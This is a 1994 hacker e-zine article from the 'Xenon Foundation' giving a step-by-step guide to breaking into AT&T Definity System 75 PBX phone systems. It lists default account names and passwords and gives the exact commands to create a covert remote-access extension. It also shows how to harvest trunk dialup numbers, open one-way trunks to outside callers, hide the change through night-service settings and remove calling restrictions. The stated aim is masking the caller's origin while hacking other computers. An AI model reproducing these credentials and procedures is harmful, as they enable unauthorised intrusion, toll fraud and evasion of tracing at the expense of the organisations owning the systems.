__ \ / |_ / \ e n o n | o u n d a t i o n presents: \ / *------ the \ / / \ files ------* / \ Spring/1994 Issue: 15 "Stealth in Diverting - PBX Style" By: Erik Turbo Disclaimer: The information provided below is solely for the purpose of diverting yourself from possible traces, ANI, and Caller ID. It is *not* to be used for long distance toll fraud, including abusing 900 services, using illicit calling cards, or other forms of credit card fraud. Introduction ~~~~~~~~~~~~ A PBX, or Private Branch eXchange, is an on-premise facility, owned or leased by an organization, which interconnects the telephones within the facility and provides access to the public telephone system. Basically, it is a mini-switching station, and allows a telephone user on the premises to dial a three to four digit number (extension) to call another telephone on the premises, and dials one digit (usually 8 or 9) to get a dial tone for an "outside line," which allows the caller to dial out to the rest of the public telephone user. This is the most important feature for a hacker that desires the stealth that is necessary to continue his explorations. In short, you can remain well-hidded if you use a PBX's outside lines to connect to the computer you are hacking. That way, any Caller ID, ANI, or trace will reach the PBX number - not your home telephone. When you have mastered the art of PBX hacking, you should make a habit of diverting with 3 or 4 "well spaced" PBX's before hitting your target destination. For the advanced hacker, diverting with PBX's is just the beginning of his actual diversion; it is best to bury yourself in packet-switched networks, loop in and out of Internet hosts, bounce yourself off of satellites with International calling, and utilize all of the data-based outdials that you have. Remember, abusing these PBX's for un-necessary long distance calling is NOT condoned by me, or any members of the Xenon Foundation; it will kill the PBX quicker, and place you at risk of serious fraudulant charges. Definity G Model System 75 ~~~~~~~~~~~~~~~~~~~~~~~~~~ Definity model System 75 systems control a large number of medium-sized (approx. 1000 lines) PBX's. It is owned by AT&T, and was developed in the late 1970's, with modifications in 1983, and 1986. The actual System 75 machine has one or more incoming 1200bps data lines, which connect at 7E1. It is through this remote port that you may begin your actual hacking of the PBX. Since all of the changes you may via modem affect the entire telephone network on the PBX, this is a power that you will have to learn how to abstain from abusing. It is possible to turn the once smoothly operating phone system into a chaotic mass of busy signals, re-routes, Voice Mail Box's, tones, and bridges, effectively shutting down the victim for hours, if not days. For this reason, I will only inform readers on how to create a remote extension for diverting purposes. Connection ~~~~~~~~~~ The best way to find a System 75 is to scan ("wargame dial") your local telephone exchanges. There are still dozens of them around, and you are bound to hit at least one in a few days of scanning. Upon connection you will see the System 75 login and authorization prompts: Login: xxx Password: xxx INCORRECT LOGIN You will be given three chances to guess authorization password before the system will drop carrier. On telephone systems that provide Caller ID services, I would be weary; it is quite possible the System 75 dialup as well as the PBX are equipt with ANI for auditing purposes. Default Accounts and Passwords ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ With every new System 75 package, AT&T includes a large number of accounts and passwords already installed and ready for usage. Usually, these passwords are never changed by the owners. Here is a listing of the known System 75 default accounts and passwords that are included in every Definity G package: Login: enquiry Password: enquirypw Login: init Password: initpw Login: browse Password: looker Login: maint Password: rwmaint Login: locate Password: locatepw Login: rcust Password: rcustpw Login: tech Password: field Login: cust Password: custpw Login: inads Password: inads Login: support Password: supportpw Login: bcim Password: bcimpw Login: bcnas Password: bcnspw Login: craft Password: craftpw Note: The browse account can *not* modify anything on the system 75. It is only useful for examining the possibility of an existing remote extension, not for the actual creation of one. Internal System 75 Commands ~~~~~~~~~~~~~~~~~~~~~~~~~~~ If those defaults did not work, the only other alternatives is social engineering, and brute force hacking. Both are not likely to work unless you are a social engineering master, or have time to waste brute force hacking. Your best bet is to move on and hope to scan a lesser protected System 75. Assuming you have passed the authorization, you will be prompted with the following: Terminal Type (513, 4410, 4425): [513] These are the basic System 75 remote usage emulation codes. I prefer to use 4410, as it appears much "cleaner" on a VT100 IBM PC. The emulation is used to remotely send System 75 key sequences, to request help, to save a session, to move forward a page, to move back a page, etc. Since the IBM keyboard has no way to emulate these keys, the System 75 provides 3 basic emulation codes. For our purposes, use 4410. The following sequences will work with emulation 4410: ESC Op - To cancel a command ESC Ot - To request Help ESC Ov - Next Page ESC Ow - Previous Page ESC Or - Save ESC Oq - Refresh Screen ESC Os - Clear Fields You can achieve the escape sequences by hitting the ESC key, and then the key combination O and the following character. Once you have choses emulation 4410, please remember (or take note) of the previous escape sequences. You will not be able to save information without knowing the proper code. ("ESC Or"). ESC Op is also very important since it is the only method of stopping the execution of a command; something you will have to do constantly when looking over certain pieces of information within the System 75. Take these down! Next you will see the AT&T banner and the command prompt: Copyright (c) 1986 - AT&T Unpublished & Not for Publication All Rights Reserved enter command: There is online help avaiable at all times by pressing "ESC Ot", as well as keying 'help' at the command prompt. Familiarize yourself with the system. It is basically cryptic, as it is usually only used by experienced AT&T technicians. Examining the PBX ~~~~~~~~~~~~~~~~~ Once you are in, you now want to get to working on your diverter. What you will obviously need is an extension dedicated explicitly for a dial tone to the outside network. To accomplish this quickly and easily, all you must do is type "change remote" at the command prompt. This will bring you to the following screen: change remote-access Page 1 of 1 REMOTE ACCESS Remote Access Extension: Barrier Code Length: BARRIER CODE ASSIGNMENTS (Enter up to 10) Barrier Code COR Barrier Code COR 1: 1 6: 1 2: 1 7: 1 3: 1 8: 1 4: 1 9: 1 5: 1 10: 1 As you can see, there is no remote access extension set up, therefor this PBX does not have any existing dialtones available. Now to create one, type in the extension you wish to direct you to your dialtone. The extension you type in should be a 4 digit number, startin with "2" or "4" as these are valid extensions under System 75 software. When you type in your extension, press enter; if it gives you an error, try a different extension until it accepts your input. If you wish to add a security code on your dialtone, you may enter it's length at the "Barrier Code Length:" prompt. Under the heading "Barrier Code", at the "1:" prompt, type in your desired security code. After you are all set, the screen should look something like this: change remote-access Page 1 of 1 REMOTE ACCESS Remote Access Extension: 2400 Barrier Code Length: 6 BARRIER CODE ASSIGNMENTS (Enter up to 10) Barrier Code COR Barrier Code COR 1: 222222 1 6: 1 2: 1 7: 1 3: 1 8: 1 4: 1 9: 1 5: 1 10: 1 Now you have a working extension that is not only available for your use in diverting, but also secure from others who do not know your barrier code. Type the key combination "ESC Or" to save your work. Finding the PBX Dialup ~~~~~~~~~~~~~~~~~~~~~~ Now that you are guarenteed a tone, you must find out the telephone number the PBX is located at. Type "list trunk-group" at the command prompt. It should give you a listing similar to this: Group No. of Outgoing Number TAC Group Type Group Name Members COR SMDR? Display? 1 801 co Incoming 12 1 y n 2 851 co Sales Room 1 1 y n 9 809 co Billing 4 1 y n 10 810 co Admin line 1 63 y n Command successfully completed CANCEL P HELP T Now that you have a listing of all the trunk groups that are present on the PBX, you can individually list them to get their corresponding telephone numbers. Type "display trunk-group 1", to display trunk group 1 (Group Number 1, Group Name "Incoming"). As you can see from the above capture, there are 4 trunks available; 1, 2, 9, and 10. Display each of them, and use the 'next page' ("ESC Ov") key combination to get to the page (usually page 2, or 3) with the telephone numbers to the trunk. Each time you display the trunks, you will get a screen similar to the following: display trunk-group 1 Page 1 of 5 TRUNK GROUP Group Number: 1 Group Type: co SMDR Reports? y Group Name: Incoming COR: 1 TAC: 801 Direction: two-way Outgoing Display? n Data Restriction? n Dial Access? y Busy Threshold: 60 Night Service: Queue Length: 0 Incoming Destination: 200 Comm Type: voice Digit Absorption List: Prefix-1? n Restriction: toll Allowed Calls List? n TRUNK PARAMETERS Trunk Type: loop-start Outgoing Dial Type: tone Trunk Termination: rc Disconnect Timing(msec): 500 ACA Assignment? n Maintenance Tests? y Answer Supervision Timeout: Suppress # Outpulsing? n _____________________________________________________________________________ To get the actual dialups, you must look on the following pages. The "ESC Ov" combination will do that under emulation 4410: _____________________________________________________________________________ display trunk-group 1 Page 2 of 5 TRUNK GROUP GROUP MEMBER ASSIGNMENTS Port Name Mode Type Answer Delay 1: A0101 555-2322 2: A0102 555-2342 3: A0103 555-2343 4: A0104 555-2345 5: A0105 555-2456 6: A0106 555-2457 7: A0107 555-2458 8: A0108 555-2459 9: A0201 555-2460 10: A0202 555-2461 11: A0203 555-2462 12: A0204 555-2470 13: A0205 555-2800 14: A0206 555-2810 15: A0207 555-2811 Make a note of the telephone numbers on the trunks, and dial them up after logging off the System 75. When you dial them up voice, if one of them prompts you for an extension, type in the remote extension you created earlier. You should hear the tone to an outside line. If you created the remote extension with a barrier code, touch-tone that in now. Next, dial "9" to get an outside line (It can also be "8" on some systems), and then dial the telephone number you want to reach, just as normally as you would from your home telephone. Tricks and Hints ~~~~~~~~~~~~~~~~ The following are methods and commands that can be used in addition to the above mentioned hacking tactics. They are not necessary to the smooth creation of a remote dialtone off of a PBX, however. When you are displaying the trunk-groups individually, look under the heading "Direction: " (found on page 1). If it says "one-way", then modify that (with the "change trunk #" command) to say "two-way". Also on page 1, change the "Incoming Destination: " header to reflect your newly created remote access extension that you created earlier. On the next page, get the dialups. You have just created a large set of tones. Since they used to be "one-way", only users within the building could use them to dialout, but since you have changed it to "two-way", and changed the incoming destination extension to your remote extension, you are allowing incoming callers to use the tone service as well. If you do not want to arouse suspicion, instead of changing the "Incoming Destination: " to your extension, just change the "Night Service: " header to your remote extension. With this, however, you can only use the tone service after hours; usually after the business closes. To get an idea of how the extensions are uniformly placed on the PBX, type "display dialplan" at the command prompt. This will give you all the prefix's to the three or four digit extensions. This is valuable if you are having trouble finding a valid extension to use for your remote extension. When displaying a trunk group, mark down the COR (Class of Restriction) number. Type "display COR #" (where # is the COR number of a specific trunk). Make sure the FRL prompt is set to 7, and the calling restrictions are set to "none". If not, type "change cor (COR #)", and make the necessary modifications. Type "display feature" to get a listing of all the feature access codes on the system. This is valuable if you can not get an outside line by dialing "9", or "8". The dialout access code will be in here. Conclusion ~~~~~~~~~~~ Basically, it is extreemly simple to create a remote extension off of a PBX in your local area. If you use the PBX just to make local calls and to divert yourself further through the telephone network, it should last a rather long time. However, if you abuse it by dialing Alliance Teleconferences every night, or to call your friend in the UK three times a day, it will either die, or get slapped with ANI. I have tried to be as straight forward as possible, without having to technically explain every detail of operation. Once you get the hang of it, you should be able to create your remote extensions in under 10 minutes. However, if you are having problems, you can contact me at the following locations: Internet Mail: erikt@xf.com Void of Deception: [508]/998-2400 Additional Reading: ~~~~~~~~~~~~~~~~~~~ Hacking AT&T System 75, Scott Simpson, Phrack 41, File 6. System 75 Hacking (An Online Tutorial), Panther Modern, COTNO01.TXT, File 3. Data and Computer Communications, William Stallings, Macmillan Publishing Co.